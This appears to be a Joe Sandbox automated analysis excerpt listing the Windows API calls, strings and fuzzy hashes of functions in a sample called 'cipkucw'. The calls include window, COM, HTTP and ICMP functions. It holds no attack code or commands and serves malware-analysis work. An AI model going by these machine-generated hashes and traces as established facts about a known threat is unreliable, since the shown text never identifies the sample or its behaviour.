                                        • DeleteDC.GDI32(00000000), ref: 007849D1
                                        • GetWindowLongW.USER32(?,000000EC), ref: 007849DB
                                        • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 007849F1
                                        • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 007849FD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                         • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                        • String ID: static
                                        • API String ID: 2559357485-2160076837
                                        • Opcode ID: 5e43cc0f145d5f01ce2b9b67f8c6ad863d53fbb471356a97850cf1f7639dc4f1
                                        • Instruction ID: 76f0783d33184958c1ec42e25071c2a4d0e874fce0fca1e87871ea2a1efb6f7e
                                        • Opcode Fuzzy Hash: 5e43cc0f145d5f01ce2b9b67f8c6ad863d53fbb471356a97850cf1f7639dc4f1
                                        • Instruction Fuzzy Hash: D831803218021AABDF21AFA4DC08FDA3BA9FF09724F114211FA54A60E0D779DC10DB58
                                        APIs
                                        • VariantInit.OLEAUT32(?), ref: 007745B9
                                        • CoInitialize.OLE32(00000000), ref: 007745E7
                                        • CoUninitialize.OLE32 ref: 007745F1
                                        • _wcslen.LIBCMT ref: 0077468A
                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 0077470E
                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 00774832
                                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 0077486B
                                        • CoGetObject.OLE32(?,00000000,00790B64,?), ref: 0077488A
                                        • SetErrorMode.KERNEL32(00000000), ref: 0077489D
                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00774921
                                        • VariantClear.OLEAUT32(?), ref: 00774935
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                         • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                        • String ID:
                                        • API String ID: 429561992-0
                                        • Opcode ID: 498f88a83ae879c75e24080e22ad8020f08d978e8b5448fc8cbe5da752b52346
                                        • Instruction ID: ccc21d1929a9d41aa89f980d5be4f7dd7acce4e9e512f10f8a076cf7dbcb4b0f
                                        • Opcode Fuzzy Hash: 498f88a83ae879c75e24080e22ad8020f08d978e8b5448fc8cbe5da752b52346
                                        • Instruction Fuzzy Hash: 8FC135B16043059FCB00DF68C88496BB7E9FF89798F10895DF9899B260DB74ED05CB92
                                        APIs
                                        • CoInitialize.OLE32(00000000), ref: 0076844D
                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 007684E9
                                        • SHGetDesktopFolder.SHELL32(?), ref: 007684FD
                                        • CoCreateInstance.OLE32(00790CD4,00000000,00000001,007B7E8C,?), ref: 00768549
                                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 007685CE
                                        • CoTaskMemFree.OLE32(?,?), ref: 00768626
                                        • SHBrowseForFolderW.SHELL32(?), ref: 007686B1
                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 007686D4
                                        • CoTaskMemFree.OLE32(00000000), ref: 007686DB
                                        • CoTaskMemFree.OLE32(00000000), ref: 00768730
                                        • CoUninitialize.OLE32 ref: 00768736
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                         • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                        • String ID:
                                        • API String ID: 2762341140-0
                                        • Opcode ID: 97415a0d21c22e4d87d9faca0eaf2f25ae9c2b79a1d421fb4e6784aa77885c5f
                                        • Instruction ID: f23e088810098702689044ec9455a2e4d3b7747a5cc9223c0a47edab2b2570ca
                                        • Opcode Fuzzy Hash: 97415a0d21c22e4d87d9faca0eaf2f25ae9c2b79a1d421fb4e6784aa77885c5f
                                        • Instruction Fuzzy Hash: 5FC12A75A00209AFCB54DFA4C884DAEBBF5FF48314B148198F91AEB262DB34ED45CB51
                                        APIs
                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0075033F
                                        • SafeArrayAllocData.OLEAUT32(?), ref: 00750398
                                        • VariantInit.OLEAUT32(?), ref: 007503AA
                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 007503CA
                                        • VariantCopy.OLEAUT32(?,?), ref: 0075041D
                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 00750431
                                        • VariantClear.OLEAUT32(?), ref: 00750446
                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 00750453
                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0075045C
                                        • VariantClear.OLEAUT32(?), ref: 0075046E
                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00750479
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                        • String ID:
                                        • API String ID: 2706829360-0
                                        • Opcode ID: 182b98ba7f40d1a3a734f144a3793a3fc7027b42e3c2c0499146a963a2294188
                                        • Instruction ID: 2f5a4a8c022dc10477667c2327caefa16564ab68febecb5bdfa5cb375fecc2fa
                                        • Opcode Fuzzy Hash: 182b98ba7f40d1a3a734f144a3793a3fc7027b42e3c2c0499146a963a2294188
                                        • Instruction Fuzzy Hash: E5417075A00219DFCB10DFA4C8489EEBBB9FF48355F10C029ED59A7261CB78AD46CB90
                                        APIs
                                          • Part of subcall function 006F2441: GetWindowLongW.USER32(00000000,000000EB), ref: 006F2452
                                        • GetSystemMetrics.USER32(0000000F), ref: 0078A926
                                        • GetSystemMetrics.USER32(0000000F), ref: 0078A946
                                        • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0078AB83
                                        • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0078ABA1
                                        • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0078ABC2
                                        • ShowWindow.USER32(00000003,00000000), ref: 0078ABE1
                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0078AC06
                                        • DefDlgProcW.USER32(?,00000005,?,?), ref: 0078AC29
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                        • String ID:
                                        • API String ID: 1211466189-3916222277
                                        • Opcode ID: ff5bc980ddbfbb80dc2901859ebcd61646b805c06c97bf01ec037f566a576dd6
                                        • Instruction ID: 0f464b4ae261ea92c8b14c4beac57912699519e5d12b9bfb1e2fdd022cdb797e
                                        • Opcode Fuzzy Hash: ff5bc980ddbfbb80dc2901859ebcd61646b805c06c97bf01ec037f566a576dd6
                                        • Instruction Fuzzy Hash: 0EB1AB71640219EFEF14DF28C984BAE3BB2FF44700F18C06AEC459B295D778A950CB62
                                        APIs
                                        • WSAStartup.WSOCK32(00000101,?), ref: 00770F19
                                        • inet_addr.WSOCK32(?), ref: 00770F79
                                        • gethostbyname.WSOCK32(?), ref: 00770F85
                                        • IcmpCreateFile.IPHLPAPI ref: 00770F93
                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00771023
                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00771042
                                        • IcmpCloseHandle.IPHLPAPI(?), ref: 00771116
                                        • WSACleanup.WSOCK32 ref: 0077111C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                        • String ID: Ping
                                        • API String ID: 1028309954-2246546115
                                        • Opcode ID: 870b32f2325af59ec6d4bfe170ea736d3efb65c6bd1f31694752da4656cd5478
                                        • Instruction ID: 5e6190862642eb32fbe1370b4fd9418bc39c11862e77b9f9478671158c939eb7
                                        • Opcode Fuzzy Hash: 870b32f2325af59ec6d4bfe170ea736d3efb65c6bd1f31694752da4656cd5478
                                        • Instruction Fuzzy Hash: 6791AD31604241DFDB20DF29C889F26BBE1AF44358F54C5A9F5698B6A2C739EC85CB81
                                        APIs
                                        • GetLocalTime.KERNEL32(?), ref: 00768BB1
                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00768BC1
                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00768BCD
                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00768C6A
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00768C7E
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00768CB0
                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00768CE6
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00768CEF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: CurrentDirectoryTime$File$Local$System
                                        • String ID: *.*
                                        • API String ID: 1464919966-438819550
                                        • Opcode ID: 7238a5ab1b82a8727dcacc35757b0eefe1cd475111616331ff1f0e2ec21087f7
                                        • Instruction ID: 7630a0a054e83e80a0304b84f8188ffd35fdc26487c604ddd0f47fbc41b09998
                                        • Opcode Fuzzy Hash: 7238a5ab1b82a8727dcacc35757b0eefe1cd475111616331ff1f0e2ec21087f7
                                        • Instruction Fuzzy Hash: 97618BB25043099FC750EF24C8449AEB3E9FF88320F00891DF99AC3251EB39E945CB62
                                        APIs
                                        • CreateMenu.USER32 ref: 007845D8
                                        • SetMenu.USER32(?,00000000), ref: 007845E7
                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0078466F
                                        • IsMenu.USER32(?), ref: 00784683
                                        • CreatePopupMenu.USER32 ref: 0078468D
                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 007846BA
                                        • DrawMenuBar.USER32 ref: 007846C2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                        • String ID: 0$F
                                        • API String ID: 161812096-3044882817
                                        • Opcode ID: 51cfa9dbd3ede8f6ec3260d1b8c06f127e5bda917dca8d1e77c621a70bec9a5f
                                        • Instruction ID: e01110c71144b6ef6650e1dd78a6d79aa2612bdfc5c052432f450ae492cc4254
                                        • Opcode Fuzzy Hash: 51cfa9dbd3ede8f6ec3260d1b8c06f127e5bda917dca8d1e77c621a70bec9a5f
                                        • Instruction Fuzzy Hash: 2141777460120AEFDF24DF64D858EAA7BB5FF0A314F144029EA45A7390DB79AD20CB54
                                        APIs
                                          • Part of subcall function 006FB25F: _wcslen.LIBCMT ref: 006FB269
                                          • Part of subcall function 00754536: GetClassNameW.USER32(?,?,000000FF), ref: 00754559
                                        • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 007527F4
                                        • GetDlgCtrlID.USER32 ref: 007527FF
                                        • GetParent.USER32 ref: 0075281B
                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 0075281E
                                        • GetDlgCtrlID.USER32(?), ref: 00752827
                                        • GetParent.USER32(?), ref: 0075283B
                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 0075283E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 711023334-1403004172
                                        • Opcode ID: d5e8a1b467411fd25c9af48da565544932b255cc98c76023fb02d3515141755b
                                        • Instruction ID: 1b84400a505c7550d183e09ec06b2a999bab6aac8b2e1de157655e613275da8e
                                        • Opcode Fuzzy Hash: d5e8a1b467411fd25c9af48da565544932b255cc98c76023fb02d3515141755b
                                        • Instruction Fuzzy Hash: 0C21C1B0900118FBCF10AFA0CC84AFEBB75EF05350F104119BA51932A6DA7859098B64
                                        APIs
                                          • Part of subcall function 006FB25F: _wcslen.LIBCMT ref: 006FB269
                                          • Part of subcall function 00754536: GetClassNameW.USER32(?,?,000000FF), ref: 00754559
                                        • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 007528D3
                                        • GetDlgCtrlID.USER32 ref: 007528DE
                                        • GetParent.USER32 ref: 007528FA
                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 007528FD
                                        • GetDlgCtrlID.USER32(?), ref: 00752906
                                        • GetParent.USER32(?), ref: 0075291A
                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 0075291D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 711023334-1403004172
                                        • Opcode ID: bad474777270bd5e37c8f37bfd3f120fd2585c890e14dd3fafc5d4bc4bca109d
                                        • Instruction ID: fd3b011aff8fda2f1a19b1d29ae676b3efa4b95a8d244973e08c4cabf7cd2a64
                                        • Opcode Fuzzy Hash: bad474777270bd5e37c8f37bfd3f120fd2585c890e14dd3fafc5d4bc4bca109d
                                        • Instruction Fuzzy Hash: 632104B5A00108FBCF11AFA0CC84EFEBBB9EF05340F104005BA50A32A6DBBD5909CB24
                                        APIs
                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 007843FC
                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 007843FF
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00784426
                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00784449
                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 007844C1
                                        • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 0078450B
                                        • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00784526
                                        • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00784541
                                        • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00784555
                                        • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00784572
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: MessageSend$LongWindow
                                        • String ID:
                                        • API String ID: 312131281-0
                                        • Opcode ID: 58be36a08cfc166bbb7f24125c753d739a84eb0652f14456f5de71285a437a6a
                                        • Instruction ID: 70958bc5df7aa01bf9e1395f3c23382662533affa598ccc9afac63431f3de5cc
                                        • Opcode Fuzzy Hash: 58be36a08cfc166bbb7f24125c753d739a84eb0652f14456f5de71285a437a6a
                                        • Instruction Fuzzy Hash: 96617C75940209AFDB11DFA8CC81EEE77B8EB09310F104159FA14E72A2C7B8AA56DF54
                                        APIs
                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0076CBCF
                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0076CBF7
                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0076CC27
                                        • GetLastError.KERNEL32 ref: 0076CC7F
                                        • SetEvent.KERNEL32(?), ref: 0076CC93
                                        • InternetCloseHandle.WININET(00000000), ref: 0076CC9E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                        • String ID:
                                        • API String ID: 3113390036-3916222277
                                        • Opcode ID: 21df391fd60b8a6e3b4adb776396378a71a02b5c4947d9b13228b005682650f3
                                        • Instruction ID: 9c99d5e939ed23c52afbeb831c68cb14fd03a9dd87aac0b58faaaf855d1cfd55
                                        • Opcode Fuzzy Hash: 21df391fd60b8a6e3b4adb776396378a71a02b5c4947d9b13228b005682650f3
                                        • Instruction Fuzzy Hash: EA314BB1600308AFD7229F65CD89ABB7BFCEB49744B10451AE88AD2240DB38DD049B75
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00735437,?,?,Bad directive syntax error,0078DCD0,00000000,00000010,?,?), ref: 0075A14B
                                        • LoadStringW.USER32(00000000,?,00735437,?), ref: 0075A152
                                          • Part of subcall function 006FB25F: _wcslen.LIBCMT ref: 006FB269
                                        • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0075A216
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: HandleLoadMessageModuleString_wcslen
                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                        • API String ID: 858772685-4153970271
                                        • Opcode ID: 027928cb04d88a0cd1843e1ac88e4faa115701dedd836964544d309e3106402d
                                        • Instruction ID: 18a9512c1f27443a1faf3eba004521affeda327e549eae2d8be73ad41c374866
                                        • Opcode Fuzzy Hash: 027928cb04d88a0cd1843e1ac88e4faa115701dedd836964544d309e3106402d
                                        • Instruction Fuzzy Hash: 8C219F7194025EFFCF15AF90CC0AEFE777ABF18304F044469F605660A2DA799A18DB25
                                        APIs
                                        • GetParent.USER32 ref: 0075293B
                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 00752950
                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 007529DD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: ClassMessageNameParentSend
                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                        • API String ID: 1290815626-3381328864
                                        • Opcode ID: c06c4e1fcb12c96b3c74bd2e395d6605199e5adfae575b213f7d4cf900ef5145
                                        • Instruction ID: 992df5133c440f462a9a4d4b6f4920e6a0498fa08a39e941c594629152745a14
                                        • Opcode Fuzzy Hash: c06c4e1fcb12c96b3c74bd2e395d6605199e5adfae575b213f7d4cf900ef5145
                                        • Instruction Fuzzy Hash: E91191B6388306BAFA142624AC0BDE677AC9F06761F300016FE44F52D2EBAD69865554
                                        APIs
                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0076CADF
                                        • GetLastError.KERNEL32 ref: 0076CAF2
                                        • SetEvent.KERNEL32(?), ref: 0076CB06
                                          • Part of subcall function 0076CBB0: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0076CBCF
                                          • Part of subcall function 0076CBB0: GetLastError.KERNEL32 ref: 0076CC7F
                                          • Part of subcall function 0076CBB0: SetEvent.KERNEL32(?), ref: 0076CC93
                                          • Part of subcall function 0076CBB0: InternetCloseHandle.WININET(00000000), ref: 0076CC9E
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                        • String ID:
                                        • API String ID: 337547030-0
                                        • Opcode ID: 12955ee60cd54a10aeeca93e6787ff71592a3edaf38f4eb65b25339bc6d59c1e
